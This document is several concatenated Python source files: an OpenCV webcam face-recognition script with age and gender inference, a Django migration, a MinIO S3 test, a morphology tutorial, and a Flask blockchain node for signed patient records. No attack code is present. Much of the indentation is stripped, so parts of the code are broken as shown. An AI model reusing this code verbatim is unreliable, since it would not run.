self.protoPath = os.path.sep.join([self.args["detector"], "deploy.prototxt"])
self.modelPath = os.path.sep.join([self.args["detector"],
"res10_300x300_ssd_iter_140000.caffemodel"])
self.detector = cv2.dnn.readNetFromCaffe(self.protoPath, self.modelPath)
# load our serialized face embedding model from disk
print("[INFO] loading face recognizer...")
self.embedder = cv2.dnn.readNetFromTorch(self.args["embedding_model"])
# load the actual face recognition model along with the label encoder
        with open(self.args["recognizer"], "rb") as f:
            self.recognizer = pickle.loads(f.read())
        with open(self.args["le"], "rb") as f:
            self.le = pickle.loads(f.read())
# Load network
self.ageNet = cv2.dnn.readNet(self.ageModel, self.ageProto)
self.genderNet = cv2.dnn.readNet(self.genderModel, self.genderProto)
self.faceNet = cv2.dnn.readNet(self.faceModel, self.faceProto)
    def setBackend(self):
        if self.args["device"] == "cpu":
            # Run inference on the CPU via the default OpenCV backend.
            for net in (self.ageNet, self.genderNet, self.faceNet):
                net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
                net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)
            print("Using CPU device")
        elif self.args["device"] == "gpu":
            # Run inference on the GPU via the CUDA backend.
            for net in (self.ageNet, self.genderNet, self.faceNet):
                net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
                net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
            print("Using GPU device")
def videostream(self):
# initialize the video stream, then allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)
# start the FPS throughput estimator
fps = FPS().start()
while True:
# grab the frame from the threaded video stream
frame = vs.read()
# resize the frame to have a width of 600 pixels (while
# maintaining the aspect ratio), and then grab the image
# dimensions
frame = imutils.resize(frame, width=600)
(h, w) = frame.shape[:2]
# construct a blob from the image
imageBlob = cv2.dnn.blobFromImage(
cv2.resize(frame, (300, 300)), 1.0, (300, 300),
(104.0, 177.0, 123.0), swapRB=False, crop=False)
# apply OpenCV's deep learning-based face detector to localize
# faces in the input image
self.detector.setInput(imageBlob)
detections = self.detector.forward()
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with
# the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections
if confidence > self.args["confidence"]:
# compute the (x, y)-coordinates of the bounding box for
# the face
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# extract the face ROI
face = frame[startY:endY, startX:endX]
(fH, fW) = face.shape[:2]
# ensure the face width and height are sufficiently large
if fW < 20 or fH < 20:
continue
# construct a blob for the face ROI, then pass the blob
# through our face embedding model to obtain the 128-d
# quantification of the face
faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255,
(96, 96), (0, 0, 0), swapRB=True, crop=False)
blob = cv2.dnn.blobFromImage(face, 1.0, (227, 227),
self.MODEL_MEAN_VALUES, swapRB=False)
self.embedder.setInput(faceBlob)
self.genderNet.setInput(blob)
vec = self.embedder.forward()
genderPreds = self.genderNet.forward()
gender = self.genderList[genderPreds[0].argmax()]
self.ageNet.setInput(blob)
agePreds = self.ageNet.forward()
age = self.ageList[agePreds[0].argmax()]
label = "{}, age:{}".format(gender, age)
print("Gender : {}, conf = {:.3f}".format(gender, genderPreds[0].max()))
print("Age Output : {}".format(agePreds))
print("Age : {}, conf = {:.3f}".format(age, agePreds[0].max()))
# perform classification to recognize the face
preds = self.recognizer.predict_proba(vec)[0]
j = np.argmax(preds)
proba = preds[j]
name = self.le.classes_[j]
# draw the bounding box of the face along with the
# associated probability
if proba > 0.6:
text = "{}: {:.2f}%".format(name, proba * 100)
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(frame, (startX, startY), (endX, endY),
(0, 255, 0), 2)
cv2.putText(frame, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.55, (0, 255, 0), 2)
else:
text = "Unknown Face Detected"
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(frame, (startX, startY), (endX, endY),
(0, 0, 255), 2)
cv2.putText(frame, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
cv2.putText(frame, label, (startX, y-30),
cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2, cv2.LINE_AA)
# update the FPS counter
fps.update()
# show the output frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
if __name__ == '__main__':
try:
r = RecognizeFaceGenderAge()
r.setBackend()
r.videostream()
except cv2.error as e:
print(e)
|
import abc
import users.person as person
class PersonValidatorInterface(metaclass=abc.ABCMeta):
@classmethod
def __subclasshook__(cls, subclass):
        return (hasattr(subclass, 'detect_user') and
                callable(subclass.detect_user) or
                NotImplemented)
@abc.abstractmethod
    def detect_user(self, image, people: list) -> person.Person:
raise NotImplementedError
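# A hedged illustration (not in the original module): thanks to the
# __subclasshook__ above, any class that defines a callable detect_user is
# treated as a virtual subclass, with no explicit inheritance required.
# FirstMatchValidator and its trivial detect_user body are made up here.
if __name__ == "__main__":
    class FirstMatchValidator:
        def detect_user(self, image, people: list) -> person.Person:
            # Trivially pick the first candidate; a real validator would
            # compare the image against each person.
            return people[0] if people else None
    assert issubclass(FirstMatchValidator, PersonValidatorInterface)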
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CanonicalFieldEntryLabel'
db.create_table(u'crowdataapp_canonicalfieldentrylabel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('value', self.gf('django.db.models.fields.CharField')(max_length=50, null=True)),
('form_field', self.gf('django.db.models.fields.related.ForeignKey')(related_name='form_field', to=orm['crowdataapp.DocumentSetFormField'])),
))
db.send_create_signal(u'crowdataapp', ['CanonicalFieldEntryLabel'])
# Adding field 'DocumentSetFieldEntry.canonical_label'
db.add_column(u'crowdataapp_documentsetfieldentry', 'canonical_label',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['crowdataapp.CanonicalFieldEntryLabel'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting model 'CanonicalFieldEntryLabel'
db.delete_table(u'crowdataapp_canonicalfieldentrylabel')
# Deleting field 'DocumentSetFieldEntry.canonical_label'
db.delete_column(u'crowdataapp_documentsetfieldentry', 'canonical_label_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'crowdataapp.canonicalfieldentrylabel': {
'Meta': {'object_name': 'CanonicalFieldEntryLabel'},
'form_field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'form_field'", 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
u'crowdataapp.document': {
'Meta': {'object_name': 'Document'},
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documents'", 'to': u"orm['crowdataapp.DocumentSet']"}),
'entries_threshold_override': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': "'512'"}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.documentset': {
'Meta': {'object_name': 'DocumentSet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'entries_threshold': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'head_html': ('django.db.models.fields.TextField', [], {'default': '\'<!-- <script> or <link rel="stylesheet"> tags go here -->\'', 'null': 'True'}),
'header_image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'128'"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}),
'template_function': ('django.db.models.fields.TextField', [], {'default': "'// Javascript function to insert the document into the DOM.\\n// Receives the URL of the document as its only parameter.\\n// Must be called insertDocument\\n// JQuery is available\\n// resulting element should be inserted into div#document-viewer-container\\nfunction insertDocument(document_url) {\\n}\\n'"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'crowdataapp.documentsetfieldentry': {
'Meta': {'object_name': 'DocumentSetFieldEntry'},
'canonical_label': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['crowdataapp.CanonicalFieldEntryLabel']", 'null': 'True'}),
'entry': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': u"orm['crowdataapp.DocumentSetFormEntry']"}),
'field_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.documentsetform': {
'Meta': {'object_name': 'DocumentSetForm'},
'button_text': ('django.db.models.fields.CharField', [], {'default': "u'Submit'", 'max_length': '50'}),
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'form'", 'unique': 'True', 'to': u"orm['crowdataapp.DocumentSet']"}),
'email_copies': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'email_from': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_subject': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'send_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': u"orm['sites.Site']", 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'crowdataapp.documentsetformentry': {
'Meta': {'object_name': 'DocumentSetFormEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'form_entries'", 'null': 'True', 'to': u"orm['crowdataapp.Document']"}),
'entry_time': ('django.db.models.fields.DateTimeField', [], {}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entries'", 'to': u"orm['crowdataapp.DocumentSetForm']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'crowdataapp.documentsetformfield': {
'Meta': {'object_name': 'DocumentSetFormField'},
'autocomplete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'choices': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'blank': 'True'}),
'default': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'field_type': ('django.db.models.fields.IntegerField', [], {}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': u"orm['crowdataapp.DocumentSetForm']"}),
'help_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'placeholder_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'verify': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'crowdataapp.documentsetrankingdefinition': {
'Meta': {'object_name': 'DocumentSetRankingDefinition'},
'amount_rows_on_home': ('django.db.models.fields.IntegerField', [], {'default': '10', 'null': 'True'}),
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rankings'", 'to': u"orm['crowdataapp.DocumentSet']"}),
'grouping_function': ('django.db.models.fields.CharField', [], {'default': "'SUM'", 'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'label_fields'", 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
'magnitude_field': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'magnitude_fields'", 'null': 'True', 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'sort_order': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'128'"}),
'show_in_leaderboard': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['crowdataapp']
|
import os
import subprocess
import time
import unittest
os.environ["MANIWANI_CFG"] = "test/media-test-config.cfg"
from shared import app, db
from model.Media import storage
DOCKER_NAME = "minio-test-instance"
MINIO_START_CMD = "docker run -d -p 9000:9000 -e MINIO_ACCESS_KEY=minio -e \
MINIO_SECRET_KEY=miniostorage --name %s minio/minio server /data" % DOCKER_NAME
MINIO_STOP_CMD = "docker kill %s" % DOCKER_NAME
MINIO_REMOVE_CMD = "docker rm %s" % DOCKER_NAME
TEST_ATTACHMENT = "./test/test_img.jpg"
def minio_available():
try:
docker_images = str(subprocess.check_output(["docker", "images"]))
return "minio/minio" in docker_images
except FileNotFoundError:
# no docker?
return False
@unittest.skipUnless(minio_available(), "Minio not available")
class TestS3(unittest.TestCase):
def setUp(self):
db.create_all()
self._start_minio()
storage._s3_client.create_bucket(Bucket="attachments")
storage._s3_client.create_bucket(Bucket="thumbs")
def tearDown(self):
subprocess.run(MINIO_STOP_CMD.split())
subprocess.run(MINIO_REMOVE_CMD.split())
def test_add_attachment(self):
attachment = open(TEST_ATTACHMENT, "rb")
# set filename attribute since werkzeug sets that on its file objects and
# storage.save_attachment expects it to be there
attachment.filename = attachment.name
storage.save_attachment(attachment)
attachment.close()
db.session.commit()
    def _start_minio(self):
        subprocess.run(MINIO_START_CMD.split())
        # Give the container a moment to start accepting connections before
        # setUp tries to create the buckets (`time` is otherwise unused).
        time.sleep(3)
|
# ! You need to understand morphological transformations before understanding the code.
# * Please check the video for more information with link below.
# # Link is here: https://pythonprogramming.net/morphological-transformation-python-opencv-tutorial/
# * Check the documentation as well for function argument options.
# # Link is here: https://docs.opencv.org/master/d9/d61/tutorial_py_morphological_ops.html#gsc.tab=0
# * For clarification on kernels and convolution, and the ones() usage in dilation and erosion.
# # Check it here: https://towardsdatascience.com/basics-of-kernels-and-convolutions-with-opencv-c15311ab8f55
# # Another one: https://github.com/atduskgreg/opencv-processing-book/blob/master/book/filters/blur.md
# # For Full Guide: https://www.pyimagesearch.com/2016/07/25/convolutions-with-opencv-and-python/
# # Visualization #1: https://compvisionlab.wordpress.com/2013/04/07/convolution-opencv/
# # Visualization #2 with OP Question: https://datascience.stackexchange.com/questions/23183/why-convolutions-always-use-odd-numbers-as-filter-size
# ! These articles take some patience to read, especially if you started off
# ! with little knowledge of college-level maths (at least enough to understand them).
# From OpenCV Library, import only IMREAD_COLOR, destroyAllWindows, dilate, erode, imread, imshow, imwrite and waitKey.
from cv2 import (
IMREAD_COLOR,
destroyAllWindows,
dilate,
erode,
imread,
imshow,
imwrite,
waitKey,
)
from numpy import ones, uint8
# Constant
WINDOW_TITLES = ["Original", "Eroded", "Dilated"]
# Input your file path here.
IMAGE_PATH = "../0_assets/img_8.png"
# ! Modify your parameters here.
PROCESS_ITERATION = 3  # The number of iterations for both the erode and dilate passes.
MATRIX_SYMMETRIC_SIZE = 3  # * Number of columns and rows of the kernel matrix.
# Read the image in color mode (OpenCV loads channels in BGR order).
original_image_buffer = imread(IMAGE_PATH, IMREAD_COLOR)
# ! About Kernel
# * You have to imagine that the whole pixel grid of the original image is a big matrix.
# * And a kernel, which is basically a small matrix (preferably of odd size),
# * has to traverse it from left to right, top to bottom.
# At each position, the patch of the big matrix covered by the kernel is multiplied
# elementwise with the kernel; the sum of all elements becomes the output value
# of the middle pixel. This is called convolution.
# ! Check the link of Visualization #2 with OP Question on the top for the actual visualization.
# * For erosion, we have to use an (m x n) matrix filled with ones,
# * because we only need to test whether each covered pixel is 1 or 0. For instance, 0 maps to black and 1 to white in img_8.
# # More Information Here: https://stackoverflow.com/questions/62417509/why-do-we-use-an-array-of-ones-for-a-kernel-in-opencv.
kernel = ones(
(MATRIX_SYMMETRIC_SIZE, MATRIX_SYMMETRIC_SIZE), uint8
)  # Ensure the matrix values are pure unsigned integers.
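# A tiny hedged illustration (values invented, borders ignored): with a 3x3
# kernel of ones, erosion keeps a pixel at 1 only if EVERY pixel under the
# kernel is 1, while dilation sets it to 1 if ANY pixel under the kernel is 1.
#   patch          eroded         dilated
#   0 1 1 1 0      0 0 0 0 0      1 1 1 1 1
#   0 1 1 1 0  ->  0 0 1 0 0  vs  1 1 1 1 1
#   0 1 1 1 0      0 0 0 0 0      1 1 1 1 1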
# Using erode and dilate methods.
erode_buffer = erode(original_image_buffer, kernel, iterations=PROCESS_ITERATION)
dilate_buffer = dilate(original_image_buffer, kernel, iterations=PROCESS_ITERATION)
# Display the images with a for loop to keep the code clean.
for idx, each_buffer in enumerate([original_image_buffer, erode_buffer, dilate_buffer]):
    imshow(
        "%s Image of %s | Processed with %s Iteration/s"
        % (WINDOW_TITLES[idx], IMAGE_PATH, PROCESS_ITERATION),
        each_buffer,
    )
    if idx > 0:
        imwrite("output_%s.png" % WINDOW_TITLES[idx].lower(), each_buffer)
if waitKey(0):
destroyAllWindows()
|
#!/usr/bin/env python3
from hashlib import sha512
import json
import time
from app.db_utils import *
import app.rsa as rsa
from base64 import b64encode, b64decode
from Crypto.PublicKey import RSA
from flask import Flask, request
import requests
# A class that represents a Block, which stores one or more pieces of data, in the immutable Blockchain.
class Block:
# One or more pieces of data (author, content, and timestamp) will be stored in a block.
# The blocks containing the data are generated frequently and added to the blockchain, each with a unique ID.
def __init__(self, index, transactions, timestamp, previous_hash):
self.index = index
self.transactions = transactions
self.timestamp = timestamp
self.previous_hash = previous_hash
self.nonce = 0
# A function that creates the hash of the block contents.
def compute_hash(self):
block_string = json.dumps(self.__dict__, sort_keys=True)
return sha512(block_string.encode()).hexdigest()
# End of Block class.
# A class that represents an immutable list of Block objects that are chained together by hashes, a Blockchain.
class Blockchain:
# Difficulty of PoW algorithm.
difficulty = 2
# One or more blocks will be stored and chained together on the Blockchain, starting with the genesis block.
def __init__(self):
# Pieces of data that are not yet added to the Blockchain.
self.unconfirmed_transactions = []
# The immutable list that represents the actual Blockchain.
self.chain = []
self.create_genesis_block()
# Generates genesis block and appends it to the Blockchain.
# The Block has index 0, previous_hash of 0, and a valid hash.
def create_genesis_block(self):
genesis_block = Block(0, [], time.time(), "0")
genesis_block.hash = genesis_block.compute_hash()
self.chain.append(genesis_block)
# Verifies the block can be added to the chain, adds it, and returns True or False.
def add_block(self, block, proof):
previous_hash = self.last_block.hash
# Verifies that the previous_hash field of block to be added points to the hash of the latest block,
# and that the PoW that is provided is correct.
if (previous_hash != block.previous_hash or not self.is_valid_proof(block, proof)):
return False
# Adds new block to the chain after verification.
block.hash = proof
self.chain.append(block)
return True
# Serves as an interface to add the transactions to the blockchain by adding them
# and then figuring out the PoW.
def mine(self):
# If unconfirmed_transactions is empty, no mining to be done.
print (self.unconfirmed_transactions)
if not self.unconfirmed_transactions:
return False
        # Authenticate the unconfirmed transactions, keeping only the valid ones.
        # (Popping from the list while enumerating it would skip the entry that
        # slides into the removed slot, so we build a filtered list instead.)
        authenticated = []
        for transaction in self.unconfirmed_transactions:
            if not self.authenticate_transaction(transaction):
                insert_audit_trail(None, transaction["patient_id"], "patient", "User {} block was rejected, unauthenticated".format(transaction["patient_id"]))
                print("Not authenticated, removing")
            else:
                insert_audit_trail(None, transaction["patient_id"], "patient", "User {} block authenticated successfully".format(transaction["patient_id"]))
                print("Transaction is authenticated")
                # The raw record was only needed for signature verification.
                transaction.pop("record", None)
                authenticated.append(transaction)
        self.unconfirmed_transactions = authenticated
# If unconfirmed_transactions is empty after auth, no mining to be done.
if not self.unconfirmed_transactions:
return False
last_block = self.last_block
# Creates a new block to be added to the chain.
new_block = Block(last_block.index + 1,
self.unconfirmed_transactions,
time.time(),
last_block.hash)
# Running PoW algorithm to obtain valid hash and consensus.
proof = self.proof_of_work(new_block)
# Verifies block can be added to the chain (previous hash matches, and PoW is valid), and adds it.
self.add_block(new_block, proof)
# Empties the list of unconfirmed transactions since they are now added to the blockchain.
self.unconfirmed_transactions = []
# Announces to the network once a block has been mined, other blocks can simply verify the PoW and add it to their respective chains.
announce_new_block(new_block)
# Returns the index of the block that was just added to the chain.
return new_block.index
# Proof of work algorithm that tries different values of nonce in order to get a hash
# that satisfies the difficulty criteria.
# Important to note that there is no definite logic to figure out the nonce quickly, simply brute force.
def proof_of_work(self, block):
block.nonce = 0
computed_hash = block.compute_hash()
while not computed_hash.startswith("0" * Blockchain.difficulty):
block.nonce += 1
computed_hash = block.compute_hash()
return computed_hash
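    # For example, with difficulty = 2 the loop keeps incrementing nonce until
    # the sha512 hex digest begins with "00" -- on average about 16**2 = 256
    # attempts, since each hex digit is uniform over 16 values.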
    # Adds a new transaction to the list of unconfirmed transactions (not yet in the blockchain).
def add_new_transaction(self, transaction):
print (self.unconfirmed_transactions)
self.unconfirmed_transactions.append(transaction)
# Checks if the chain is valid at the current time.
@classmethod
def check_chain_validity(cls, chain):
result = True
previous_hash = "0"
for block in chain:
            block_hash = block.hash
            # Remove the hash attribute so compute_hash reproduces the original digest.
            delattr(block, "hash")
            if not cls.is_valid_proof(block, block_hash) or previous_hash != block.previous_hash:
result = False
break
block.hash = block_hash
previous_hash = block_hash
return result
# Checks if block_hash is a valid hash of the given block, and if it satisfies the difficulty criteria.
@classmethod
def is_valid_proof(cls, block, block_hash):
return (block_hash.startswith("0" * Blockchain.difficulty) and block_hash == block.compute_hash())
@classmethod
def authenticate_transaction(cls, block):
db_conn = get_db_conn()
res = get_public_key(db_conn, block["patient_id"])
pb_key = res[0]
return cls.verify_signature(block, pb_key)
# Verify document
@classmethod
def verify_signature(cls, block, pub_key):
content = block["record"].encode('utf-8')
signature = b64decode(block["signature"])
print (signature)
print (content)
pub_key = b64decode(pub_key)
#print (pub_key)
pub_key = RSA.importKey(pub_key)
verify = rsa.verify(content, signature, pub_key)
return verify
# Returns the current last Block in the Blockchain.
@property
def last_block(self):
return self.chain[-1]
# End of Blockchain class.
# Flask web application
# Creates a new Flask web app.
app = Flask(__name__)
# The node's copy of the blockchain.
blockchain = Blockchain()
# A set that stores the addresses to other participating members of the network.
peers = set()
# Creates a new endpoint, and binds the function to the URL.
@app.route("/new_transaction", methods=["POST"])
# Submits a new transaction, which adds new data to the blockchain.
def new_transaction():
insert_audit_trail(None,"System","System", "New block has been added to block chain")
tx_data = request.get_json()
# required_fields = ["author", "content"]
# for field in required_fields:
# if not tx_data.get(field):
# return "Invalid transaction data", 404
tx_data["timestamp"] = time.time()
print (tx_data)
blockchain.add_new_transaction(tx_data)
return "Success", 201
# Creates a new endpoint, and binds the function to the URL.
@app.route("/chain", methods=["GET"])
# Returns the node's copy of the blockchain in JSON format (to display all confirmed transactions/posts).
def get_chain():
# Ensures that the user's chain is the current (longest) chain.
consensus()
chain_data = []
for block in blockchain.chain:
chain_data.append(block.__dict__)
return json.dumps({"length": len(chain_data), "chain": chain_data})
# Creates a new endpoint, and binds the function to the URL.
@app.route("/mine", methods=["GET"])
# Requests the node to mine the unconfirmed transactions (if any).
def mine_unconfirmed_transactions():
insert_audit_trail(None,"System","System", "Start mining unconfirmed transactions")
result = blockchain.mine()
if not result:
return "There are no transactions to mine."
insert_audit_trail(None,"System","System", "Block #{0} has been mined".format(result))
return "Block #{0} has been mined.".format(result)
# Creates a new endpoint, and binds the function to the URL.
@app.route("/add_nodes", methods=["POST"])
# Adds new peers to the network.
def register_new_peers():
nodes = request.get_json()
if not nodes:
return "Invalid data", 400
for node in nodes:
insert_audit_trail(None,"System","System", "Adding new peer {} to the network".format(str(node)))
peers.add(node)
return "Success", 201
# Creates a new endpoint, and binds the function to the URL.
@app.route("/pending_tx")
# Queries unconfirmed transactions.
def get_pending_tx():
insert_audit_trail(None,"System","System", "Getting unconfirmed transactions for the network")
return json.dumps(blockchain.unconfirmed_transactions)
# A simple algorithm to achieve consensus to maintain the integrity of the system.
# If a longer valid chain is found, the chain is replaced with it, and returns True, otherwise nothing happens and returns False.
def consensus():
    global blockchain
    longest_chain = None
    curr_len = len(blockchain.chain)
    # Achieve consensus by checking every peer's chain and adopting the longest valid one.
    for node in peers:
        response = requests.get("http://{0}/chain".format(node))
        length = response.json()["length"]
        chain_dump = response.json()["chain"]
        # Rebuild Block objects from the JSON dump so check_chain_validity can inspect them.
        chain = []
        for block_data in chain_dump:
            block = Block(block_data["index"], block_data["transactions"],
                          block_data["timestamp"], block_data["previous_hash"])
            block.nonce = block_data["nonce"]
            block.hash = block_data["hash"]
            chain.append(block)
        if length > curr_len and blockchain.check_chain_validity(chain):
            curr_len = length
            longest_chain = chain
    # Replace only the chain itself, keeping the Blockchain wrapper object.
    if longest_chain:
        blockchain.chain = longest_chain
        return True
